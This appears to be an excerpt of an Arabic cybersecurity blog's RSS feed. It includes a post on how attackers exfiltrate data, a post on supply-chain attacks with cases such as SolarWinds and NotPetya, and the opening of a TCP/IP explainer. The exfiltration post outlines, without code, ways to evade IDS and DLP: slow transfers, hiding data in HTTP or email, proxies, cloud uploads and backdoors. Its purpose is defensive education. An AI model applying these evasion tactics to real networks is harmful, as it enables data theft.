&lt;p&gt;كيفية إخراج هذه البيانات من الشبكة المستهدفة دون أن يتم اكتشافه؟ هنا تتطلب العملية تخطيط دقيق واستخدام تكتيكات متقدمة.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;الخطوات-الأساسية-لعملية-تسريب-البيانات&quot;&gt;الخطوات الأساسية لعملية تسريب البيانات&lt;/h2&gt;
&lt;p&gt;&lt;img alt=&quot;مخطط الخطوات الخمس لتسريب البيانات: السيطرة على الجهاز ثم الوصول للبيانات فتجميعها فضغطها وتشفيرها ثم إرسالها بسرية عبر الشبكة&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.C6rj2JZN_1ANQ4z.webp&quot;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;الحصول على السيطرة على جهاز الضحية&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;الخطوة الأولى تتطلب من المهاجم الحصول على صلاحيات التحكم بجهاز الضحية وهذا الأمر يتم عادةً عبر سلسلة Cyber Kill Chain التي تشمل مراحل مثل استغلال الثغرات وزرع البرمجيات الخبيثة وتنفيذ التعليمات البرمجية عن بُعد.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;الوصول إلى البيانات المستهدفة&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;بعد أن تتم عملية الاختراق، يبدأ المهاجم في البحث عن البيانات التي يريد سرقتها ويمكنه القيام بذلك عبر تقنيات متعددة، مثل مشاركة الملفات عبر الأنظمة أو جلسات SSH أو أدوات متخصصة تتيح الوصول إلى قواعد البيانات والسيرفرات الداخلية.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;إعادة ترتيب البيانات على الجهاز المصاب&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;في بيئات العمل الآمنة، لا تكون السيرفرات الداخلية متصلة بالإنترنت مباشرة ولهذا السبب، يلجأ المهاجم إلى تجميع البيانات على جهاز مخترق يمكنه التحكم به ليستخدمه كنقطة انطلاق لنقل البيانات للخارج.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;تشفير وضغط البيانات&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;قبل نقل البيانات، يقوم المهاجم بضغطها وتشفيرها باستخدام أدوات مثل 7zip or WinRAR، مما يقلل من حجم البيانات ويجعل اكتشافها أكثر صعوبة، عادةً ما يتم تقسيم الملفات إلى أجزاء صغيرة لمنع كشف أي نشاط غير طبيعي في حركة البيانات عبر الشبكة.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;إرسال البيانات بسرية عبر الشبكة&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;يتم إرسال البيانات ببطء عبر الشبكة بطريقة لا تثير الشكوك والهدف هو تجنب الظهور في سجلات المراقبة كجهاز يستهلك من عرض الحزمة بشكل غير عادي، مما قد يؤدي إلى اكتشاف عملية الاختراق من قبل أنظمة كشف الاختراق (IDS) أو أنظمة منع تسريب البيانات (DLP).&lt;/p&gt;
&lt;h2 id=&quot;التحدي-الرئيسي-كيف-يخرج-المهاجم-البيانات-دون-اكتشافه&quot;&gt;التحدي الرئيسي: كيف يخرج المهاجم البيانات دون اكتشافه؟&lt;/h2&gt;
&lt;p&gt;عندما يصبح المهاجم جاهز لنقل البيانات إلى خارج الشبكة، فإنه يواجه مشكلة رئيسية:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;كيف يجد طريقة للخروج دون أن يتم اكتشافه من قبل أنظمة الحماية؟&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img alt=&quot;مخطط جدار الحماية والمنافذ المسموح بها للخروج: المنفذ 22 لـSSH و25 لـSMTP و80 لـHTTP و443 لـHTTPS&quot; width=&quot;1600&quot; height=&quot;905&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.Bl49sKQU_Z133X0q.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;إذا كانت الشبكة المستهدفة محمية بشكل صحيح، فمن المفترض أن تكون هناك قيود صارمة على حركة البيانات الصادرة عبر جدار الحماية، على سبيل المثال: قد تكون المنافذ المفتوحة محدودة للغاية وتشمل فقط المنافذ التالية:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;المنفذ 22 (SSH)&lt;/strong&gt;: يُستخدم عادةً للوصول عن بُعد إلى السيرفرات.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;المنفذ 25 (SMTP)&lt;/strong&gt;: يُستخدم لنقل البريد الإلكتروني.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;المنفذ 80 (HTTP) والمنفذ 443 (HTTPS)&lt;/strong&gt;: تُستخدم لتصفح الإنترنت ونقل البيانات عبر بروتوكول الويب.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;كيف-يتحايل-المهاجم-على-القيود-الأمنية&quot;&gt;كيف يتحايل المهاجم على القيود الأمنية؟&lt;/h2&gt;
&lt;p&gt;في بعض الحالات، يكون هناك تحكم صارم في كيفية استخدام هذه المنافذ، على سبيل المثال: قد يكون المنفذ 25 مخصصاً فقط لسيرفر البريد الإلكتروني وقد لا تكون المنافذ 80 و 443 محمية بجدار ناري يمنع الاتصال المباشر إلى أي وجهة خارجية.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;لهذا السبب، يلجأ المهاجم إلى استراتيجيات مثل:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;إخفاء البيانات داخل حركة البيانات الشرعية&lt;/strong&gt;: مثل تضمينها داخل طلبات HTTP أو تشفيرها ضمن حزم البريد الإلكتروني.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;استخدام سيرفرات وسيطة (Proxy Servers)&lt;/strong&gt;: لنقل البيانات إلى خارج الشبكة دون كشف الهوية الحقيقية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;استغلال خدمات الحوسبة السحابية&lt;/strong&gt;: مثل Google Drive أو Dropbox حيث يتم رفع البيانات المشفرة على هذه الخدمات قبل تنزيلها من جهاز آخر.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;دور-مرحلة-ما-بعد-الاستغلال-post-exploitation&quot;&gt;دور مرحلة ما بعد الاستغلال (Post-Exploitation)&lt;/h2&gt;
&lt;p&gt;بعد أن يتمكن المهاجم من الوصول إلى البيانات المستهدفة، تبدأ مرحلة ما بعد الاستغلال، التي تشمل عدة تكتيكات، منها:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;الحصول على بيانات تسجيل الدخول&lt;/strong&gt;: لا يكتفي المهاجم بسرقة البيانات فقط، بل يسعى أيضاً للحصول على بيانات تسجيل الدخول ليتمكن من تنفيذ المزيد من الهجمات لاحقاً.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;التنقل الجانبي (Lateral Movement)&lt;/strong&gt;: محاولة الانتقال إلى أجهزة أخرى داخل الشبكة للوصول إلى بيانات إضافية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;المحافظة على الوصول&lt;/strong&gt;: تثبيت أبواب خلفية (Backdoors) لضمان إمكانية الوصول المستمر إلى الشبكة حتى بعد اكتشاف الهجوم وإصلاح الثغرة الأمنية.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;في هذه المرحلة، تصبح مهمة فرق الأمن السيبراني أكثر تعقيداً، حيث يجب عليهم رصد أي نشاط غير طبيعي، مثل زيادة في استهلاك عرض الحزمة أو محاولات الاتصال غير المصرح بها.&lt;/p&gt;
&lt;h2 id=&quot;في-النهاية&quot;&gt;في النهاية&lt;/h2&gt;
&lt;p&gt;سرقة البيانات هي واحدة من أخطر التهديدات التي تواجه المؤسسات اليوم. يتطلب نجاح الهجوم استخدام تكتيكات متقدمة تعتمد على التخفي والتحايل على أنظمة الحماية ولهذا السبب، من الضروري أن تعتمد المؤسسات استراتيجيات دفاعية متعددة الطبقات تشمل:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;مراقبة حركة البيانات وتحليلها باستمرار&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;استخدام أنظمة كشف الاختراق IDP وأنظمة منع تسرب البيانات (DLP)&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تعزيز سياسات الأمن وتقييد الوصول إلى البيانات الحساسة&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;إذا كنت مهتم بكيفية بناء استراتيجيات دفاع قوية لحماية الشبكات من هذا النوع من الهجمات وضمان كشف التهديدات في مراحلها المبكرة قبل أن تتحول إلى كارثة أمنية انصحك بالاستعداد للإنضمام &lt;a href=&quot;https://platform.cyberpedia.site/courses/blue-team-bootcamp/&quot;&gt;لمعسكر الفريق الأزرق&lt;/a&gt; الذي سيتم الإعلان عنه في الأيام القادمة.&lt;/p&gt;
</content:encoded><category>اختبار الاختراق</category><category>تسريب البيانات</category><category>سرقة البيانات</category><category>Data Exfiltration</category><category>ما بعد الاستغلال</category></item><item><title>هجمات سلاسل التوريد: التهديد الصامت في العالم الرقمي</title><link>https://blog.cyberpedia.site/supply-chain-attack/</link><guid isPermaLink="true">https://blog.cyberpedia.site/supply-chain-attack/</guid><description>كيف تعمل هجمات سلاسل التوريد عبر اختراق الموردين والتحديثات الموثوقة، ولماذا يصعب كشفها، مع أمثلة SolarWinds وNotPetya وTarget وطرق التصدي لها.</description><pubDate>Fri, 20 Sep 2024 16:03:50 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;هجمات سلاسل التوريد لا تستهدف الضحية مباشرة، بل تخترق مورداً أو شريكاً موثوقاً وتزرع برمجيات خبيثة في منتجاته أو تحديثاته، فتثبّتها الشركة المستهدفة دون علمها. خطورتها في صعوبة اكتشافها واتساع تأثيرها، كما في هجوم SolarWinds عام 2020، ويُحد منها بتدقيق أمن الشركاء والتحديث المنتظم وكشف التهديدات والمراقبة المستمرة.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;في العصر الرقمي المتسارع، أصبحت الهجمات السيبرانية تهديداً متزايداً للشركات والمؤسسات وحتى الدول و من بين هذه التهديدات، برزت هجمات سلاسل التوريد كواحدة من أكثر الاستراتيجيات تعقيداً وخطورة. هذا النوع من الهجمات لا يستهدف الضحية بشكل مباشر، بل يستغل العلاقات بين الضحية وشركائها التجاريين أو التقنيين لتحقيق اختراق غير متوقع.&lt;/p&gt;
&lt;h2 id=&quot;ما-هي-سلاسل-التوريد&quot;&gt;ما هي سلاسل التوريد؟&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://www.aljazeera.net/tech/2021/6/17/%D9%85%D8%A7-%D9%87%D9%88-%D9%87%D8%AC%D9%88%D9%85-%D8%B3%D9%84%D8%B3%D9%84%D8%A9-%D8%A7%D9%84%D8%AA%D9%88%D8%B1%D9%8A%D8%AF&quot;&gt;سلاسل التوريد هي الشبكات المعقدة التي تربط بين الشركات والموردين والشركاء التجاريين&lt;/a&gt; لتوفير المنتجات أو الخدمات التي تحتاجها الشركات لتشغيل أعمالها. تتكون هذه السلاسل من عدة مراحل مترابطة، تشمل الحصول على المواد الخام و التصنيع و التوزيع والتسليم, كل مرحلة من هذه المراحل تعتمد على مرحلة أخرى لإتمام عملية الإنتاج أو توفير الخدمة بنجاح.&lt;/p&gt;
&lt;p&gt;على سبيل المثال، عندما تقوم شركة بإنتاج هاتف ذكي، تعتمد هذه الشركة على عدد من الموردين الخارجيين لتوفير المكونات مثل الشاشات و المعالجات، والكاميرات، ثم تقوم الشركة بتجميع هذه المكونات في مصنعها الخاص, بعد ذلك، يتم توزيع المنتج النهائي على التجار أو العملاء عبر شبكة من الشركاء اللوجستيين.
في هذه الحالة، كل مزود أو شريك في هذه العملية يُعتبر جزءا من سلسلة التوريد.&lt;/p&gt;
&lt;p&gt;في المجال الرقمي مفهوم سلاسل التوريد يمتد إلى الشركات التي تقدم برمجيات أو خدمات تقنية للمؤسسات، مثل أنظمة إدارة الشبكات أو حلول الأمان الرقمي.
في هذه الحالة، تعتمد المؤسسات على الشركاء لتزويدها بالبرمجيات أو التحديثات الضرورية لتشغيل أنظمتها، مما يعني أن أي خلل أو اختراق لدى المورد يمكن أن يؤثر بشكل مباشر على المؤسسة بأكملها.&lt;/p&gt;
&lt;p&gt;تعمل سلاسل التوريد على مبدأ الثقة المتبادلة، حيث تعتمد الشركات على شركائها لتزويدهم بالمنتجات والخدمات الآمنة والمضمونة. لكن هذه الثقة يمكن أن تُستغل من قبل المهاجمين، حيث يمكن لهجمات سلاسل التوريد استهداف الموردين أو الشركاء الأضعف للوصول إلى الشركات الكبرى من خلال نقاط ضعف غير متوقعة.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;مخطط مراحل سلسلة التوريد لهاتف ذكي: المكونات من الموردين ثم التصنيع ثم التوزيع ثم التسليم&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.BqBxkRR8_ZTG1wO.webp&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;كيف-تعمل-هجمات-سلاسل-التوريد&quot;&gt;كيف تعمل هجمات سلاسل التوريد؟&lt;/h2&gt;
&lt;p&gt;هجمات سلاسل التوريد تعمل عن طريق استهداف العلاقات التجارية أو التقنية بين الشركات وشركائها الخارجيين بدلا من مهاجمتها مباشرة. تعتمد الشركات على مزودي خدمات أو منتجات خارجية لإدارة جوانب مهمة من عملياتها، مثل البرمجيات، الأجهزة و حتى الخدمات اللوجستية.
المهاجمون يستغلون هذه الثقة الموجودة بين الشركات وشركائها عن طريق اختراق المورد أو الشريك الذي يُعتبر جزءا من سلسلة التوريد.&lt;/p&gt;
&lt;p&gt;بعد نجاحهم في اختراق أنظمة هذا الشريك، يقومون بحقن البرمجيات الخبيثة أو تعديل المنتجات التي سيتم إرسالها لاحقا إلى الشركة المستهدفة, عندما تستلم الشركة هذه المنتجات أو التحديثات “الموثوقة”، تقوم بتثبيتها على أنظمتها دون معرفة أن البرمجيات الخبيثة قد تم إدخالها.
هذا يسمح للمهاجمين بالتسلل إلى الأنظمة الداخلية للشركة المستهدفة دون الحاجة لمهاجمتها بشكل مباشر مما يجعل الهجوم أكثر تعقيدا وأصعب في الكشف.&lt;/p&gt;
&lt;p&gt;بعبارة أخرى، هجمات سلاسل التوريد تستغل الاعتماد المتبادل بين الشركات والموردين لاختراق الهدف بطرق ملتوية يصعب اكتشافها، وغالبا ما تُكتشف الهجمات بعد وقوع الضرر.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;مخطط مراحل هجوم سلسلة التوريد: اختراق المورد ثم حقن البرمجية الخبيثة ثم تثبيت التحديث الموثوق ثم التسلل إلى الأنظمة&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.D5nndjwV_1PJAgG.webp&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;لماذا-تعتبر-هجمات-سلاسل-التوريد-خطيرة-للغاية&quot;&gt;لماذا تعتبر هجمات سلاسل التوريد خطيرة للغاية؟&lt;/h2&gt;
&lt;p&gt;هجمات سلاسل التوريد تعتبر خطيرة للغاية لأنها تستغل أحد أعقد وأضعف نقاط الأنظمة الأمنية في العالم الرقمي: العلاقات التجارية والتقنية المعتمدة على الثقة بين الشركات وشركائها ومورديها, هذه الهجمات تمنح المهاجمين القدرة على التسلل إلى أنظمة الشركات بطريقة ملتوية يصعب اكتشافها لأنها تعتمد على نقاط ضعف خارجية في شركاء أو مزودي خدمات بدلا من مهاجمة الشركة بشكل مباشر.
هنا بعض العوامل التي توضح لماذا تُعد هذه الهجمات خطيرة بشكل خاص:&lt;/p&gt;
&lt;h3 id=&quot;1-استهداف-البنية-التحتية-الحيوية&quot;&gt;1. استهداف البنية التحتية الحيوية&lt;/h3&gt;
&lt;p&gt;في كثير من الأحيان، هجمات سلاسل التوريد, تستهدف البنية التحتية الحيوية, مثل الأنظمة الحكومية، المستشفيات، شبكات الطاقة أو المؤسسات المالية. عندما يتمكن المهاجمون من الوصول إلى هذه الأنظمة من خلال الموردين أو الشركاء التقنيين، فإنهم يمكن أن يتسببوا في أضرار كبيرة للأنظمة الحيوية على نطاق وطني أو عالمي.
مما يزيد من خطورة الهجوم وتأثيره على المجتمع ككل.&lt;/p&gt;
&lt;h3 id=&quot;2-صعوبة-اكتشافها&quot;&gt;2. صعوبة اكتشافها&lt;/h3&gt;
&lt;p&gt;أحد أكبر أسباب خطورة هجمات سلاسل التوريد هو القدرة على التسلل ببطء وخفاء، عندما تعتمد شركة على مزود خارجي لتزويدها ببرامج أو مكونات معينة، فإنها تثق في أن هذا المزود يقدم خدمات أو منتجات آمنة.
المهاجمون يستغلون هذه الثقة لإدخال برمجيات خبيثة أو تغييرات ضارة في منتجات أو تحديثات تأتي من مورد موثوق.
هذا يعني أن الهجوم قد يستمر لشهور أو حتى سنوات قبل اكتشافه، مما يمنح المهاجمين وقتا طويلا للتجسس أو سرقة البيانات أو تنفيذ هجمات لاحقة.&lt;/p&gt;
&lt;h3 id=&quot;3-التأثير-واسع-النطاق&quot;&gt;3. التأثير واسع النطاق&lt;/h3&gt;
&lt;p&gt;هجمات سلاسل التوريد لا تؤثر فقط على شركة واحدة، بل يمكن أن تؤثر على شبكة كاملة من الشركات المرتبطة بمورد معين.
فعلى سبيل المثال، إذا تم اختراق مزود برمجيات يستخدمه عدد كبير من الشركات، فإن البرمجيات الخبيثة يمكن أن تنتشر إلى آلاف الأنظمة في وقت قصير، مما يضاعف الأضرار.
تأثير الهجوم يمكن أن يكون عالميا نظرا لأن الشركات متعددة الجنسيات غالبا ما تعتمد على نفس الموردين.&lt;/p&gt;
&lt;h3 id=&quot;4-استهداف-الموردين-الضعفاء&quot;&gt;4. استهداف الموردين الضعفاء&lt;/h3&gt;
&lt;p&gt;غالبا ما تكون الشركات الكبيرة تمتلك إجراءات أمنية معقدة وصعبة الاختراق.
لكن الموردين والشركاء الأصغر قد لا يملكون نفس مستوى الأمان, المهاجمون يدركون أن مهاجمة الموردين الأضعف هي طريقة فعالة للوصول إلى الشركات الكبرى.
على سبيل المثال، يمكن لمهاجم أن يخترق موردا صغيرا يقدم برامج للشركات الكبرى، وحينما تقوم تلك الشركات الكبرى بتحديث برمجياتها من هذا المورد، يدخل المهاجم إلى أنظمتها بسهولة.&lt;/p&gt;
&lt;h3 id=&quot;5-الهجوم-من-داخل-الأنظمة&quot;&gt;5. الهجوم من داخل الأنظمة&lt;/h3&gt;
&lt;p&gt;بمجرد أن يقوم المهاجمون بالوصول إلى الشركة المستهدفة من خلال سلسلة التوريد، فإنهم يكونون في موقع مثالي داخل الأنظمة نفسها. هذا يعني أن لديهم مستوى عالٍ من الوصول والقدرة على التجسس أو تعطيل الأنظمة من الداخل، وهو ما يجعل الهجوم أكثر خطورة من الهجمات التقليدية التي تأتي من خارج النظام.
بإمكان المهاجمين تنفيذ أوامر أو استغلال الثغرات بدون أن يثيروا الشبهات لفترة طويلة.&lt;/p&gt;
&lt;h3 id=&quot;6-تعدد-الأهداف&quot;&gt;6. تعدد الأهداف&lt;/h3&gt;
&lt;p&gt;هجمات سلاسل التوريد تعطي المهاجمين فرصة للوصول إلى أهداف متعددة عبر هجوم واحد, بدلا من استهداف شركة واحدة فقط.
يمكن أن يستهدف المهاجم موردا أو برمجية تستخدمها عدة شركات في صناعات أو قطاعات مختلفة، هذا يجعل الهجوم أكثر فعالية من حيث الجهد والنتائج، حيث يمكن للمهاجمين التأثير على مئات أو آلاف الشركات من خلال إصابة مزود واحد فقط.&lt;/p&gt;
&lt;h3 id=&quot;7-التبعات-المالية-الكبيرة&quot;&gt;7. التبعات المالية الكبيرة&lt;/h3&gt;
&lt;p&gt;التبعات المالية لهذه الهجمات يمكن أن تكون مدمرة, الشركات قد تواجه تكاليف ضخمة في محاولة احتواء الهجوم، تنظيف أنظمتها، وتحسين أمانها بعد الحادث.
إضافة إلى ذلك، فقدان الثقة من العملاء والشركاء التجاريين قد يؤدي إلى خسائر اقتصادية كبيرة في الإيرادات, وقد تمتد التبعات إلى عقوبات قانونية إذا تم اكتشاف أن الشركة لم تقم بإجراءات كافية لحماية بيانات العملاء.&lt;/p&gt;
&lt;h2 id=&quot;أمثلة-بارزة-على-هجمات-سلاسل-التوريد&quot;&gt;أمثلة بارزة على هجمات سلاسل التوريد&lt;/h2&gt;
&lt;p&gt;هجمات سلاسل التوريد أصبحت أحد أكثر الأدوات استخداما في الهجمات السيبرانية الحديثة، وقد أثرت على شركات وحكومات حول العالم. فيما يلي بعض الأمثلة البارزة عن هذه الهجمات:&lt;/p&gt;
&lt;h3 id=&quot;1-هجوم-solarwinds-2020&quot;&gt;1. هجوم SolarWinds (2020)&lt;/h3&gt;
&lt;p&gt;يُعد هجوم “SolarWinds” واحدا من أكبر هجمات سلاسل التوريد في التاريخ.
تم اختراق شركة SolarWinds، وهي شركة تقدم برامج إدارة الشبكات، المهاجمون قاموا بزرع برمجيات خبيثة في تحديثات أحد منتجاتها الرئيسية “Orion”، وهو برنامج يُستخدم لمراقبة وإدارة شبكات الكمبيوتر, عند تحديث هذا البرنامج، تم تثبيت البرمجيات الخبيثة في آلاف المؤسسات، بما في ذلك وكالات حكومية وشركات خاصة في جميع أنحاء العالم.
المهاجمون تمكنوا من الوصول إلى أنظمة حساسة لأشهر قبل اكتشاف الهجوم.&lt;/p&gt;
&lt;h3 id=&quot;2-هجوم-notpetya-2017&quot;&gt;2. هجوم NotPetya (2017)&lt;/h3&gt;
&lt;p&gt;هجوم NotPetya هو هجوم سيبراني مدمر انتشر بسرعة في جميع أنحاء العالم.
بدأ الهجوم من خلال استهداف شركة أوكرانية تقدم برنامج محاسبة. عندما تم تحديث البرنامج، تم زرع برمجية خبيثة في التحديث الذي أصاب الأنظمة بالشلل.
انتشرت هذه البرمجية الخبيثة بسرعة عبر سلاسل التوريد، مما تسبب في خسائر مالية ضخمة لمئات الشركات حول العالم، مثل “Maersk” و”Merck”.&lt;/p&gt;
&lt;h3 id=&quot;3-هجوم-target-2013&quot;&gt;3. هجوم Target (2013)&lt;/h3&gt;
&lt;p&gt;في عام 2013، تعرضت سلسلة المتاجر الأمريكية “Target” لاختراق أدى إلى سرقة بيانات ملايين العملاء، بما في ذلك بيانات بطاقات الائتمان.
المهاجمون استغلوا ثغرة في أحد مزودي الخدمات الذي كان مسؤولا عن أنظمة التدفئة والتبريد في متاجر Target.
من خلال هذا الاختراق البسيط في سلسلة التوريد، تمكن المهاجمون من الوصول إلى شبكة Target الداخلية وسرقة البيانات الحساسة.&lt;/p&gt;
&lt;h3 id=&quot;4-هجوم-asus-live-update-2019&quot;&gt;4. هجوم ASUS Live Update (2019)&lt;/h3&gt;
&lt;p&gt;في عام 2019، تم استهداف شركة ASUS من خلال هجوم سلاسل التوريد.
المهاجمون تمكنوا من اختراق خوادم تحديث البرامج الخاصة بشركة ASUS وزرعوا برمجيات خبيثة في أداة التحديث “ASUS Live Update”. عندما قام المستخدمون بتحديث برامجهم، تم تثبيت البرمجيات الخبيثة على ملايين الأجهزة حول العالم، مما سمح للمهاجمين بالوصول إلى الأنظمة المستهدفة.&lt;/p&gt;
&lt;h3 id=&quot;5-هجوم-ccleaner-2017&quot;&gt;5. هجوم CCleaner (2017)&lt;/h3&gt;
&lt;p&gt;برنامج CCleaner، وهو برنامج شائع يستخدم لتنظيف وتحسين أداء الحواسيب، تم اختراقه في عام 2017.
المهاجمون استغلوا شركة Avast، المطورة للبرنامج، وزرعوا برمجيات خبيثة في النسخة الرسمية من البرنامج.
عندما قام المستخدمون بتحميل وتحديث CCleaner، تم إصابة أنظمتهم بالبرمجيات الخبيثة.
التأثير كان كبيرا لأن البرنامج كان يُستخدم على نطاق واسع في جميع أنحاء العالم.&lt;/p&gt;
&lt;h3 id=&quot;6-هجوم-shadowpad-2017&quot;&gt;6. هجوم ShadowPad (2017)&lt;/h3&gt;
&lt;p&gt;هجوم ShadowPad استهدف العديد من الشركات والمؤسسات عن طريق إصابة برنامج إدارة قواعد البيانات الشهير “NetSarang” ببرمجيات خبيثة.
المهاجمون استغلوا هذا البرنامج الموثوق به والذي يُستخدم على نطاق واسع في إدارة الأنظمة والشبكات في المؤسسات الكبيرة. بعد تحديث البرنامج، تم تثبيت البرمجيات الخبيثة في الأنظمة المصابة، مما أعطى المهاجمين القدرة على التحكم عن بُعد في هذه الأنظمة.&lt;/p&gt;
&lt;h3 id=&quot;7-هجمات-سلاسل-التوريد-في-الأحداث-الأخيرة-بلبنان&quot;&gt;7. هجمات سلاسل التوريد في الأحداث الأخيرة بلبنان&lt;/h3&gt;
&lt;p&gt;في الأحداث الأخيرة التي شهدتها لبنان، تكررت الإشارات إلى هجمات سلاسل التوريد كأحد الأدوات التي استُخدمت لتحقيق أهداف معينة.
تشير التقارير إلى أن هذه الهجمات قد لعبت دورا في تلك الأحداث عبر استغلال نقاط ضعف في البنية التحتية التكنولوجية أو الخدمات التي تقدمها شركات خارجية.&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;أربع طرق للتصدي لهجمات سلاسل التوريد: تدقيق الشركاء وتحديث الأنظمة وكشف التهديدات والتشفير والمراقبة&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-04.C1IRpWgY_Z1GzoJy.webp&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;كيف-يمكن-التصدي-لهجمات-سلاسل-التوريد&quot;&gt;كيف يمكن التصدي لهجمات سلاسل التوريد؟&lt;/h2&gt;
&lt;p&gt;مع تزايد هذه الهجمات، أصبحت الحاجة إلى تعزيز الأمان في سلاسل التوريد أمرا ضروريا.
هناك عدة استراتيجيات يمكن اتباعها للحد من مخاطر هذه الهجمات:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;التدقيق الأمني للشركاء:&lt;/strong&gt; يجب على المؤسسات التأكد من أن الموردين والشركاء الذين يتعاملون معهم يلتزمون بأعلى معايير الأمان السيبراني.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تحديث الأنظمة بانتظام:&lt;/strong&gt; يجب التأكد من أن جميع البرمجيات والأجهزة يتم تحديثها باستمرار باستخدام أحدث التصحيحات الأمنية.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;تطبيق استراتيجيات كشف التهديدات:&lt;/strong&gt; من المهم استخدام أدوات كشف التهديدات والاختراقات التي يمكن أن تساعد في تحديد الهجمات المحتملة قبل أن تتسبب في أضرار كبيرة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;التشفير والمراقبة المستمرة:&lt;/strong&gt; يجب تأمين البيانات المهمة وضمان مراقبة مستمرة لأي نشاط غير طبيعي داخل الشبكات.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;الخلاصة&quot;&gt;الخلاصة&lt;/h2&gt;
&lt;p&gt;تُعد هجمات سلاسل التوريد من أخطر الأسلحة في الحروب السيبرانية الحديثة.
هذه الهجمات تتميز بالتخفي والقدرة على التسلل عبر نقاط ضعف غير متوقعة في سلاسل التوريد التي تعتمد عليها الشركات والمؤسسات.
وفي ظل الأحداث الأخيرة التي شهدتها لبنان، زاد الحديث عن هذا النوع من الهجمات، مما يبرز الحاجة إلى تعزيز الدفاعات السيبرانية على كافة المستويات لضمان حماية الأنظمة الحساسة.&lt;/p&gt;
&lt;p&gt;من المهم أن تدرك المؤسسات أن التهديدات قد لا تأتي دائما من مصادر مباشرة، بل يمكن أن تكون مختبئة في العلاقات التجارية والتكنولوجية التي تربطها بالآخرين.&lt;/p&gt;
</content:encoded><category>الأمن السيبراني</category><category>هجمات سلاسل التوريد</category><category>Supply Chain Attack</category><category>SolarWinds</category><category>البرمجيات الخبيثة</category><category>أمن الموردين</category></item><item><title>انتقال البيانات عبر شبكة الإنترنت من وجهة نظر مختلفة – الرحلة الكاملة</title><link>https://blog.cyberpedia.site/data-traffic/</link><guid isPermaLink="true">https://blog.cyberpedia.site/data-traffic/</guid><description>شرح نموذج TCP/IP بقصة مبسطة: كيف تنتقل البيانات من طبقة التطبيقات إلى النقل والإنترنت والربط، وتتحول من Data إلى Segments ثم Packets ثم Frames.</description><pubDate>Wed, 18 Sep 2024 16:42:56 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;تنتقل البيانات عبر الإنترنت وفق نموذج TCP/IP بالمرور على أربع طبقات: طبقة التطبيقات مثل HTTP تجهز البيانات، وطبقة النقل TCP تقسمها إلى Segments وتحدد المنفذ 80، وطبقة الإنترنت IP تضيف العنوان فتصبح Packets، وطبقة الربط Ethernet تضيف عنوان MAC فتصبح Frames، ثم تُعالج بالترتيب المعاكس عند الوجهة.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;تعد عملية انتقال البيانات عبر شبكة الإنترنت من أهم الركائز التي يعتمد عليها عالمنا الرقمي الحديث، فبفضل هذه العملية يمكننا التواصل، تبادل المعلومات والعمل عن بعد بسهولة وسرعة، لكن وراء تلك البساطة الظاهرة وهذه السرعة الفائقة قصة مشوقة تستحق أن تُروى، تخفي في أعماقها رحلة معقدة تبدأ من أجهزتنا الإلكترونية وتنتهي عند سيرفر ما أو جهاز آخر في الجانب الآخر من العالم.&lt;/p&gt;
